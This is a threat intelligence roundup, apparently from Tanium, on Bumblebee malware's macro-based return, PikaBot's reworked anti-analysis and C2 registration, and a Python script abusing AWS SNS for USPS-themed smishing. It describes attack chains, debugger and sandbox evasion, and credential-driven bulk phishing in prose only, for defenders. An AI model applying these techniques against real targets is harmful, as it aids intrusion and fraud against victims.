CTI Roundup: Return of Bumblebee and PikaBot Malware, Spammers Hit AWS SNS

This week CTI investigates Bumblebee malware’s return to the threat landscape after a four-month hiatus. Next, CTI looks at PikaBot malware which has reemerged with significant changes to its code base and structure. Also included is a breakdown of how threat actors are using AWS Simple Notification Service (SNS) and a custom spam script called SNS Sender in an ongoing smishing campaign.

1. Bumblebee returns from hiatus

According to Proofpoint, Bumblebee malware has returned to the threat landscape after a brief hiatus. Before this campaign, which was observed on February 8, Bumblebee malware was absent from Proofpoint’s data for four months.

The latest campaign

In Bumblebee’s latest campaign, threat actors sent several thousand emails to various organizations across the U.S. with the subject, “Voicemail February.”

These emails were all sent from the same email address and contained OneDrive URLs. If the victim clicked on a OneDrive URL, they were led to a Word document that spoofed a consumer electronics company called Humane.

The Word document leveraged macros that create a script in the Windows temp directory. The macros would then execute the script via wscript.

Malware execution

The dropped temporary file contained a PowerShell command that is responsible for downloading and executing the next stage of the attack.

This next stage was another PowerShell command that was responsible for downloading and executing the Bumblebee DLL. The Bumblebee configuration in this campaign included a campaign ID of “dcc3” and an RC4 key of “NEW_BLACK.”

Noteworthy campaign features

What is interesting about this campaign is the use of VBA macro-enabled documents, which we are seeing less and less of ever since Microsoft started blocking macros by default.

Of the roughly 230 Bumblebee campaigns that Proofpoint identified since March 2022, only five campaigns used macro-laden content, while four used XL4 macros, and just one used VBA macros.

Overall, the attack chain for this campaign is noticeably different than previous Bumblebee campaigns, even those that used the “NEW_BLACK” configuration.

Attribution

Proofpoint has not yet been able to attribute this latest Bumblebee malware activity to a particular threat actor. Researchers noticed that the lure theme surrounding voicemails, the use of OneDrive URLs, and the sender email address aligned with previous activity from TA579. However, Proofpoint was not able to definitively make that conclusion. Proofpoint mentions that Bumblebee malware can be used to deliver different follow-on payloads like ransomware, making it more difficult to attribute to a single actor.

Analyst comments from Tanium’s Cyber Threat Intelligence team

This is the first time we’ve reported on Bumblebee malware since it popped up last year. When malware returns from hiatus, it typically has new and improved functionality and TTPs. But this time, Bumblebee returned using a technique that many threat actors are moving away from.

The intent behind using this technique is not clear but nonetheless indicates that we may start seeing more Bumblebee activity.

2. PikaBot reappears with optimized code

Researchers have observed PikaBot malware in new campaigns with significant changes to its code base and structure.

PikaBot’s developers have reduced the complexity of the code, resulting in the removal of advanced obfuscation techniques and changes in network communications.

What is PikaBot?

• PikaBot malware first emerged early in 2023. It consists of two main components including a loader and a core module.
• The core module executes commands and injects payloads received from a C2 server. The malware uses similar distribution methods and behaviors to that of QBot malware.
• After the FBI took down the QBot malware operation, there was a spike in PikaBot activity — most likely because a BlackBasta ransomware affiliate began replacing its use of QBot with PikaBot. PikaBot then seemed to cease activity at the end of December 2023.
• Recent campaigns have been observed, indicating PikaBot’s return to the threat landscape. The latest variant has significant changes that reduce the complexity of the code. Zscaler believes this version is currently in a new development cycle and testing phase.

Anti-analysis technique

The most notable change to PikaBot’s anti-analysis techniques is its string obfuscation. Older PikaBot versions had each string obfuscated by combining the RC4 algorithm with AES-CBC, which was a very effective method. In the latest version, most strings are constructed by obtaining a character and pushing it onto the stack. Like previous variants, this variant also inserts junk code in between legitimate instructions.

In addition to these techniques, PikaBot uses two methods to detect a debugging session. It will read the BeingDebugged flag from the process environment block and will also call the Windows API function CheckRemoteDebuggerPresent.

It will continue to make these checks throughout various portions of its code. Similarly, the malware will leverage different methods to ensure it is not being run in a sandbox environment. Lastly, the malware will stop its execution if it detects either the Russian or Ukrainian language.

Bot initialization phase

The latest version of PikaBot stores all settings and information in one single structure. This configuration is stored in plaintext and at one address and is much simpler than previous versions that required the decrypting of each element at runtime.

When PikaBot parses the plaintext information it erases it, setting all bytes to zero. The malware then loads the remaining required Windows API functions and generates a bot identifier for the host.

Network communications

The last phase of the malware involves reaching out to the C2 server to obtain various network commands. The network protocol for this has changed significantly in this latest PikaBot version. The malware will begin by registering the compromised host to its server and collecting information about the compromised host like monitor display settings, beacon and delay settings, and domain controller name.

It will then append the 32-byte network RC4 key, an unknown registry key name, and the number of swap rounds used to encode the data to the registration packet. It encrypts the collected data and sends it with a POST request to the C2 server.

If the bot registration is successful, PikaBot will initiate an infinite loop to request and execute network commands. A full list of supported network commands is detailed in Zscaler’s report.

Analyst comments from Tanium’s Cyber Threat Intelligence team

The latest version of PikaBot malware takes a much different approach by decreasing the complexity of the code. This is unusual as new malware variants are usually more advanced and complex.

PikaBot still poses a significant threat and has previously been leveraged by threat actors that were known to distribute QBot malware.

3. Threat actors distribute spam via AWS SNS

Threat actors are now using AWS Simple Notification Service (SNS) along with a custom spam script called SNS Sender in an ongoing smishing campaign. The author behind the malicious script has been tied to numerous phishing kits on the market.

Campaign overview

SNS Sender is a custom Python script that uses AWS SNS to send bulk SMS messages containing phishing links. SentinelOne notes that SNS Sender is the first script that leverages AWS SNS in spamming attacks. The messages often impersonate USPS. What’s more, researchers have identified links between the creator of this tool and several other phishing kits but believe that this tool may still be in the testing phase.

About the script

The SNS Sender script needs a list of phishing links, links[.]txt, in its working directory in order to launch. It accepts several arguments as input including a text file of AWS access keys, secrets, and regions, a text file of phone numbers to target, a sender ID, and the message content itself.

The script has a function called “send_sns_message” that will set up an interface between the script and the AWS SNS backend to send the SMS messages. The inclusion of a sender ID variable is an interesting choice according to SentinelOne as this variable is optional and is not supported in all countries. For example, in the U.S., carriers do not support sender IDs, but they are mandatory in India. This is interesting given the fact that the messages in this campaign are often USPS-themed, which conflicts with the inclusion of a sender ID. This could indicate that the threat actor behind the activity is in a country where sender IDs are mandatory.

The script will establish a while loop to iterate through the list of AWS credentials and regions that were previously inputted. It will replace any instances of the string “linkas” with a URL from the previously inputted links[.]txt file. The link is randomly selected and will weaponize the message as a true phishing SMS.

Phishing kits

The author behind the script goes by the alias of ARDUINO_DAS. Researchers identified more than 150 phishing kit files referencing this actor, more than half of which are USPS-themed.

Researchers dove into active campaigns from January 2024 that made use of USPS-themed phishing and discovered a basic flow. The landing pages would tell the victim that their package was not able to be delivered and ask them to click a button for help. This button directs the victim to a tracking page that pretends to be tracking details of the package but also requests that the victim input PII like their name, phone number, and email address.

Next, the victim is led to another page that asks them to enter a credit card number to pay for a redelivery fee. The credit card number is forwarded to a card checker that is believed to be run via a Telegram service.

Analyst comments from Tanium’s Cyber Threat Intelligence team

As SentinelOne explains, threat actors do not typically use AWS SNS — even though they are increasingly leveraging the cloud in their attacks.

SNS Sender is a new approach requiring the actor to access a properly configured AWS SNS tenant. Further, its inclusion of a sender ID in a USPS-themed campaign is questionable and makes it likely that this tool is still under development.

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum and start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.